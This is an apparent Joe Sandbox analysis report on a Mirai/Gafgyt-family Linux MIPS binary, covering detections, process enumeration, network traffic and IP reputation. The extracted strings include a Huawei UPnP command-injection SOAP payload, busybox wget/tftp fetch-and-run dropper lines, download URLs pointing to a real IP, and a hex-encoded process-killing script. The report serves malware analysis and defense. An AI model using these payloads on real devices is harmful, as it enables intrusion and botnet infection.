Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bin.mipsel.elf

Overview

General Information

Sample name:bin.mipsel.elf
Analysis ID:1538208
MD5:25b7df65636b6205023e1f8a1410025b
SHA1:c92a5fef6214a7c84c0327e7cce63254a46be4c9
SHA256:d27aed220d88d7173e5b738c58d6316aaa0d0ad67e0b0f6d8a9702bf75e28403
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1538208
Start date and time:2024-10-20 20:16:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.mipsel.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@0/0
  • VT rate limit hit for: bin.mipsel.elf
Command:/tmp/bin.mipsel.elf
PID:6237
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The mushi are out today
The mushi are out today
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.mipsel.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    bin.mipsel.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      bin.mipsel.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        SourceRuleDescriptionAuthorStrings
        6237.1.00007f4494400000.00007f449443b000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
          6237.1.00007f4494400000.00007f449443b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            6237.1.00007f4494400000.00007f449443b000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6261.1.00007f4494400000.00007f449443b000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
                6261.1.00007f4494400000.00007f449443b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                  Click to see the 7 entries
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: bin.mipsel.elfAvira: detected
                  Source: bin.mipsel.elfReversingLabs: Detection: 47%
                  Source: bin.mipsel.elfString: Killed process %d (path: %s) because it matched kill string "%s" in path_kill_strings.Killed process %d (command line: %s) because it matched kill string "%s" in cmdline_kill_strings./proc/%d/stat%dMUSHI_KILLER/proc/root/tmp/varcurlwgetftpscp
                  Source: bin.mipsel.elfString: /bin/busyboxenableshellshlinuxshellping ;shusage: busyboxreps.check-host.co/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
                  Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                  Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                  Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                  Source: bin.mipsel.elfString found in binary or memory: http:///curl.sh
                  Source: bin.mipsel.elfString found in binary or memory: http:///wget.sh
                  Source: bin.mipsel.elfString found in binary or memory: http://178.215.238.13/bin.armv4l;chmod
                  Source: bin.mipsel.elfString found in binary or memory: http://178.215.238.13/bin.armv7l;chmod
                  Source: bin.mipsel.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: bin.mipsel.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 178.215.238.13 -l /tmp/.unstable -r /bin.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: usage: busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                  Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                  Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                  Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshellshlinuxshellping ;shusage: busyboxreps.check-host.co/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
                  Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4(
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: classification engineClassification label: mal80.troj.linELF@0/0@0/0
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1582/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1582/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/3088/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/3088/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/230/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/230/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/110/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/110/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/231/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/231/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/111/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/111/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/232/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/232/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1579/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1579/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/112/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/112/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/233/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/233/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1699/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1699/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/113/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/113/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/234/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/234/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1335/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1335/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1698/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1698/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/114/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/114/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/235/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/235/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1334/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1334/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1576/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1576/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2302/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2302/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/115/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/115/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/236/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/236/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/116/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/116/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/237/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/237/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/117/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/117/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/118/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/118/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/910/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/910/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/119/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/119/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/912/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/912/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/10/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/10/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2307/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2307/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/11/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/11/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/918/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/918/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/12/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/12/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/13/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/13/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/14/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/14/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/15/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/15/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/16/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/16/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/17/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/17/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/18/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/18/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/6246/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/6246/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1594/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1594/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/120/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/120/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/121/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/121/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1349/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1349/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/1/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/122/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/122/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/243/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/243/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/123/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/123/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/2/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/124/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/124/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/3/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/3/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/4/statJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)File opened: /proc/4/cmdlineJump to behavior
                  Source: /tmp/bin.mipsel.elf (PID: 6237)Queries kernel information via 'uname': Jump to behavior
                  Source: bin.mipsel.elf, 6237.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6261.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6263.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
                  Source: bin.mipsel.elf, 6237.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6261.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6263.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmpBinary or memory string: )x86_64/usr/bin/qemu-mipsel/tmp/bin.mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.mipsel.elf
                  Source: bin.mipsel.elf, 6237.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6261.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6263.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
                  Source: bin.mipsel.elf, 6237.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6261.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6263.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmpBinary or memory string: +*V!/etc/qemu-binfmt/mipsel

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: bin.mipsel.elf, type: SAMPLE
                  Source: Yara matchFile source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: bin.mipsel.elf, type: SAMPLE
                  Source: Yara matchFile source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6237, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6261, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6263, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: bin.mipsel.elf, type: SAMPLE
                  Source: Yara matchFile source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: bin.mipsel.elf, type: SAMPLE
                  Source: Yara matchFile source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6237, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6261, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bin.mipsel.elf PID: 6263, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Scripting
                  Path InterceptionDirect Volume Access1
                  OS Credential Dumping
                  11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  SourceDetectionScannerLabelLink
                  bin.mipsel.elf47%ReversingLabsLinux.Backdoor.Gafgyt
                  bin.mipsel.elf100%AviraEXP/ELF.Mirai.W
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  No contacted domains info
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://178.215.238.13/bin.armv7l;chmodbin.mipsel.elffalse
                    unknown
                    http://schemas.xmlsoap.org/soap/encoding/bin.mipsel.elffalse
                    • URL Reputation: safe
                    unknown
                    http:///wget.shbin.mipsel.elffalse
                      unknown
                      http:///curl.shbin.mipsel.elffalse
                        unknown
                        http://178.215.238.13/bin.armv4l;chmodbin.mipsel.elffalse
                          unknown
                          http://schemas.xmlsoap.org/soap/envelope/bin.mipsel.elffalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          109.202.202.202
                          unknownSwitzerland
                          13030INIT7CHfalse
                          91.189.91.43
                          unknownUnited Kingdom
                          41231CANONICAL-ASGBfalse
                          91.189.91.42
                          unknownUnited Kingdom
                          41231CANONICAL-ASGBfalse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                          91.189.91.43bin.armv6l.elfGet hashmaliciousMiraiBrowse
                            mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                              mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  bin.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      tftp.elfGet hashmaliciousUnknownBrowse
                                        .i.elfGet hashmaliciousUnknownBrowse
                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            sshd.elfGet hashmaliciousUnknownBrowse
                                              91.189.91.42bin.armv6l.elfGet hashmaliciousMiraiBrowse
                                                mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      bin.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          tftp.elfGet hashmaliciousUnknownBrowse
                                                            .i.elfGet hashmaliciousUnknownBrowse
                                                              x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBbin.armv6l.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  bin.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  tftp.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 185.125.190.26
                                                                  x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  CANONICAL-ASGBbin.armv6l.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  bin.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  tftp.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 185.125.190.26
                                                                  x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  INIT7CHbin.armv6l.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
